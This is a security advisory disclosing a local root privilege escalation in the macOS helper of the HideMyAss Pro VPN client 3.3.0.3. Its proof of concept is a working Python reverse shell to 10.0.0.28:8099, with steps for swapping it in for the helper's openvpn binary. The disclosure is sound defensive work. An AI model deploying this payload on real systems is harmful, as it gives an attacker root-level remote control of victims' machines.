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HideMyAss Pro VPN Client 3.3.0.3 Privilege Escalation

Posted on 01 May 2017

------------------------------------------------------------------------ Local privilege escalation vulnerability in HideMyAss Pro VPN client v3.x for macOS ------------------------------------------------------------------------ Han Sahin, April 2017 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature check's on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ There is currently no fix available. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings. The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature check's on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root. Proof of Concept 1) Create an Python script named openvpn and make sure it is executable (chmod u+x). #!/usr/bin/python import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); 2) Replace the openvpn binary located in the path below with this Python script. /Applications/HMA! Pro VPN.app/Contents/XPCServices/HMA! Pro VPN Engine.xpc/Contents/MacOS/ 3) Wait until the victim opens a VPN connection.

 

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